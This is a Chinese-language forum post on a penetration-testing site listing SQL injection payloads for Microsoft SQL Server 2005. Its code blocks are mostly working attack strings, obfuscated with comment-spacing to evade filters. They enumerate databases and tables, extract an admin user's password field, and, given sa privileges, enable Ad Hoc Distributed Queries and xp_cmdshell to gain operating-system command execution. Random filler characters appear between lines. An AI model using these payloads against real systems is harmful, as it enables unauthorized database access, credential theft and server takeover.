中国网络渗透测试联盟
标题:
MSsql2005注入语句
[打印本页]
作者:
admin
时间:
2012-9-13 17:19
标题:
MSsql2005注入语句
/ t& _ i( v) ?6 v/ t# e
6 \$ P+ w( i [- |' z$ M( m
8 y4 v6 l# N2 l& u0 ^7 f0 u5 J0 `
[Copy to clipboard]CODE:
% Q/ \* `1 G8 }- {4 H) A
/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
5 A. A' Q; }# }& x
/ o: G- M7 s3 ?( P4 s& } O$ k
爆表语句,somedb部份是所要列的数据库,红色数字1累加
2 S, s$ b/ U- f& [
0 }$ J- S) u# R8 _; k% x3 B& s- ^
% w7 [2 E; w+ M: b0 Y* y* d) V
[Copy to clipboard]CODE:
" Y: |1 K% C; ?
/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
2 [2 A8 R: x7 G! b
, R0 }3 }, W7 H3 F) G6 `& s1 U4 X
爆字段语句,爆表admin里user='icerover'的密码段
5 p# h# m9 d- E& S0 k
" F2 c! }0 i9 j4 d* m; O8 R
, q7 z) O5 o& O2 \+ h o1 T8 O& B
[Copy to clipboard]CODE:
8 y. q* `2 k- ^5 Z9 Z1 G* H1 I8 y9 P+ K
**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
6 i5 R+ T- c% P9 }1 y( e+ x# `
! a) p S/ _+ U) Y( v$ y, b
mssql2005默认没有开xp_cmdshell的,openrowset也不能用
C- Z! V5 l0 s+ P- H7 e- A. G
如果是sa权限,可以这样来开启
$ i' A$ ], _" }1 ^' j
开启openrowset
u* X4 s* }+ N3 i& w
& k6 I6 k2 X5 Z: P$ H
; Q; e/ c5 l$ Q0 n
[Copy to clipboard]CODE:
4 h* g: \6 e7 v
/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--
" p5 H1 M; Z9 L" F
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
. B) n" ^& D" a1 \4 s) t
5 [* S* S" Z" C' t+ z
开启xp_cmdshell
0 |6 m% T% v# p7 `. V
, X; N x u- Z3 m) z3 P" H
% g, g7 L' L4 J) S, P0 N8 ]) |, E
[Copy to clipboard]CODE:
A. C0 m4 G9 h- ]7 V- S
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--
3 [9 i" `. E. u0 k
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
4 H% ^; x* D6 o( b+ s! S
; z: L5 O, P$ p- ]( w, C0 A
ok,over~~晚安
) q% g% `5 P, }$ k" y
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2